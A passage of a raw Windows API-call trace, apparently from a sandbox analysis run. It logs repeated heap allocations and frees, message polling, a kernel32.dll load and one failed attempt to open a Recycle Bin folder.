hHeap=0x8a0000) returned 1 [0199.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2500 | out: hHeap=0x8a0000) returned 1 [0199.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0199.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd2a0 | out: hHeap=0x8a0000) returned 1 [0199.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd2d0 | out: hHeap=0x8a0000) returned 1 [0199.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd240 | out: hHeap=0x8a0000) returned 1 [0199.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0199.824] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0199.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2500 [0199.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2470 [0199.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0199.824] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0199.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0199.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2470 | out: hHeap=0x8a0000) returned 1 [0199.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0199.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e2470 [0199.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0199.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd240 [0199.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e24d0 [0199.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd2d0 [0199.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24d0 | out: hHeap=0x8a0000) returned 1 [0199.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e24d0 [0199.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd2a0 [0199.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a40 [0199.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a40 | out: hHeap=0x8a0000) returned 1 [0199.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a40 [0199.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd258 [0199.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e24a0 [0199.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24a0 | out: hHeap=0x8a0000) returned 1 [0199.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd1c8 [0199.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de128 [0199.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd270 [0199.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24a0 [0199.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd270 | out: hHeap=0x8a0000) returned 1 [0199.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb28 [0199.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd270 [0199.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd1f8 [0199.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0199.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd2e8 [0199.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24b0 [0199.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd2e8 | out: hHeap=0x8a0000) returned 1 [0199.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea60 [0199.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd2e8 [0199.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0199.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd1b0 [0199.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2440 [0199.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd1e0 [0199.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2480 [0199.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2480 | out: hHeap=0x8a0000) returned 1 [0199.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0199.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bcfe8 [0199.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2480 [0199.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bcfa0 [0199.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2460 [0199.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2460 | out: hHeap=0x8a0000) returned 1 [0199.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0199.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd048 [0199.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2460 [0199.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd048 | out: hHeap=0x8a0000) returned 1 [0199.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0199.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd048 [0199.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e24f0 [0199.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24f0 | out: hHeap=0x8a0000) returned 1 [0199.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0199.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd000 [0199.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24f0 [0199.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd000 | out: hHeap=0x8a0000) returned 1 [0199.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0199.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd000 [0199.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0199.826] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0199.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0199.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bcfd0 [0199.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24c0 [0199.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd138 [0199.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd0f0 [0199.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e24e0 [0199.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd0f0 | out: hHeap=0x8a0000) returned 1 [0199.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24e0 | out: hHeap=0x8a0000) returned 1 [0199.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0199.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd0f0 [0199.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24e0 [0199.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd120 [0199.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd108 [0199.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2450 [0199.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd108 | out: hHeap=0x8a0000) returned 1 [0199.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2450 | out: hHeap=0x8a0000) returned 1 [0199.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0199.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd108 [0199.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2450 [0199.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd0d8 [0199.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd0c0 [0199.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2430 [0199.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd0c0 | out: hHeap=0x8a0000) returned 1 [0199.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2430 | out: hHeap=0x8a0000) returned 1 [0199.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0199.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd0c0 [0199.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2430 [0199.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd090 [0199.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd0a8 [0199.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2420 [0199.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd0a8 | out: hHeap=0x8a0000) returned 1 [0199.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2420 | out: hHeap=0x8a0000) returned 1 [0199.827] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0199.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2420 [0199.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0199.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd0a8 [0199.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2410 [0199.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2410 | out: hHeap=0x8a0000) returned 1 [0199.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd060 [0199.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2410 [0199.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2410 | out: hHeap=0x8a0000) returned 1 [0199.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd0a8 | out: hHeap=0x8a0000) returned 1 [0199.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd060 | out: hHeap=0x8a0000) returned 1 [0199.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0199.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2410 [0199.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0199.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0199.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2410 | out: hHeap=0x8a0000) returned 1 [0199.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2420 | out: hHeap=0x8a0000) returned 1 [0199.827] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0199.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2420 [0199.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0199.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd060 [0199.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2410 [0199.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2410 | out: hHeap=0x8a0000) returned 1 [0199.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd0a8 [0199.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2410 [0199.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2410 | out: hHeap=0x8a0000) returned 1 [0199.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd060 | out: hHeap=0x8a0000) returned 1 [0199.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd0a8 | out: hHeap=0x8a0000) returned 1 [0199.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0199.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2410 [0199.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0199.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0199.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2410 | out: hHeap=0x8a0000) returned 1 [0199.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2420 | out: hHeap=0x8a0000) returned 1 [0199.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0199.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd0a8 [0199.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd060 [0199.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd018 [0199.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd078 [0199.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd228 [0199.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd2b8 [0199.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd288 [0199.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd210 [0199.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bcfb8 [0199.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bcf70 [0199.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bcf88 [0199.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0199.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0199.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bcf40 [0199.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2420 [0199.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0199.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bcf58 [0199.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2410 [0199.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2410 | out: hHeap=0x8a0000) returned 1 [0199.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bcf10 [0199.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2410 [0199.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2410 | out: hHeap=0x8a0000) returned 1 [0199.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcf58 | out: hHeap=0x8a0000) returned 1 [0199.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcf10 | out: hHeap=0x8a0000) returned 1 [0199.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0199.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2420 | out: hHeap=0x8a0000) returned 1 [0199.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd060 | out: hHeap=0x8a0000) returned 1 [0199.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd0a8 | out: hHeap=0x8a0000) returned 1 [0199.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd018 | out: hHeap=0x8a0000) returned 1 [0199.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd078 | out: hHeap=0x8a0000) returned 1 [0199.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd228 | out: hHeap=0x8a0000) returned 1 [0199.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd288 | out: hHeap=0x8a0000) returned 1 [0199.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd2b8 | out: hHeap=0x8a0000) returned 1 [0199.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd210 | out: hHeap=0x8a0000) returned 1 [0199.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcf70 | out: hHeap=0x8a0000) returned 1 [0199.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcfb8 | out: hHeap=0x8a0000) returned 1 [0199.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcf88 | out: hHeap=0x8a0000) returned 1 [0199.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcf40 | out: hHeap=0x8a0000) returned 1 [0199.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0199.830] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0199.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2420 [0199.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0199.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bcf40 [0199.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2410 [0199.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2410 | out: hHeap=0x8a0000) returned 1 [0199.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bcf88 [0199.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2410 [0199.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2410 | out: hHeap=0x8a0000) returned 1 [0199.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcf40 | out: hHeap=0x8a0000) returned 1 [0199.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcf88 | out: hHeap=0x8a0000) returned 1 [0199.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0199.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2410 [0199.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0199.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0199.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2410 | out: hHeap=0x8a0000) returned 1 [0199.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2420 | out: hHeap=0x8a0000) returned 1 [0199.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0199.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bcf88 [0199.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bcf40 [0199.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bcfb8 [0199.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bcf70 [0199.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd210 [0199.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd2b8 [0199.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd288 [0199.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd228 [0199.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd078 [0199.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd018 [0199.831] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0199.831] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0199.831] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0199.831] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0199.831] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0199.831] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0199.831] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0199.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x91d5a8 | out: hHeap=0x8a0000) returned 1 [0199.831] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0199.831] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0199.831] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0199.831] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0199.831] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0199.831] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0199.831] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.832] CreateFileW (lpFileName="c:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0199.832] FreeLibrary (hLibModule=0x75990000) returned 1 [0199.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e23e0 | out: hHeap=0x8a0000) returned 1 [0199.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e23d0 | out: hHeap=0x8a0000) returned 1 [0199.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e23c0 | out: hHeap=0x8a0000) returned 1 [0199.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e23b0 | out: hHeap=0x8a0000) returned 1 [0199.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e23a0 | out: hHeap=0x8a0000) returned 1 [0199.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2390 | out: hHeap=0x8a0000) returned 1 [0199.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2380 | out: hHeap=0x8a0000) returned 1 [0199.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0199.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcda8 | out: hHeap=0x8a0000) returned 1 [0199.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2400 | out: hHeap=0x8a0000) returned 1 [0199.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd018 | out: hHeap=0x8a0000) returned 1 [0199.833] 